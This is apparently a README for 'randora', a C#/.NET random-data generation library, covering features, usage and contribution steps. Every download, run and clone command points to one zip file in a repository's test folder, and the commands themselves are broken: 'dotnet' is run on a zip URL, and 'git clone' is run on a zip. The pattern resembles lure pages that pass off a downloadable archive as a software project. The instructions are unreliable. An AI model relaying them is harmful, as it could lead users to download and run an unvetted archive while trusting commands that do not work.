Welcome to randora! This tool makes generating random data simple. Whether you need random numbers, text, or even complex data structures, randora can help you.
To get started, you need to download randora. You can do this by visiting our Releases page. Hereβs the link:
Click the button above or visit this page to download the latest version: Download randora.
randora runs on Windows, macOS, and Linux. Make sure your system has .NET 6 or later installed. If you donβt have it, you can download it from the official .NET website.
- Generate Primitives: Create random integers, floats, and other basic data types.
- Collections: Easily generate lists, arrays, and dictionaries filled with random values.
- Tuples: Create random tuples to structure your data.
- Enums: Generate random enum values for better testing.
- Text and Time Values: Create random strings and dates to fit your needs.
- Shuffle: Randomly shuffle items in your collections to create variety.
Once you have downloaded and installed randora, follow these steps:
-
Open a Command Prompt or Terminal:
- For Windows, you can search for "cmd" in the Start menu.
- For macOS or Linux, open your Terminal application.
-
Navigate to the Installation Folder: Use the
cdcommand to change directories to where you installed randora. For example:cd path/to/randora -
Run randora: Type the following command:
dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip
You will see a list of options available for generating random data.
Here are some examples of how to use randora:
-
Generate Random Numbers:
dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip generate numbers --count 10
-
Generate Random Text:
dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip generate text --length 15
-
Shuffle a List:
dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip shuffle --items item1,item2,item3
If you encounter any issues or have questions, feel free to reach out to us. You can create an issue on our GitHub repository.
We also encourage contributions! If you want to add features or fix bugs, just fork the repo and make a pull request.
We welcome contributions to randora. Before you begin, please read our guidelines on contributing to ensure a smooth process.
- Fork the Repository: Click on the "Fork" button on GitHub.
- Clone Your Fork: Use the command:
git clone https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip
- Create a Branch:
git checkout -b feature-name
- Make Changes and Commit:
- Push and Create a Pull Request:
Keep in mind to keep your code clean and add comments for clarity.
This project focuses on:
- collections
- csharp
- dotnet
- immutable-collections
- library
- random
- random-data
- random-data-generation
- shuffle
- tuple
- xunit
Explore these topics to find even more ways to use randora.
We hope you find randora helpful for your data generation needs. Donβt forget to visit our Releases page to download the latest version!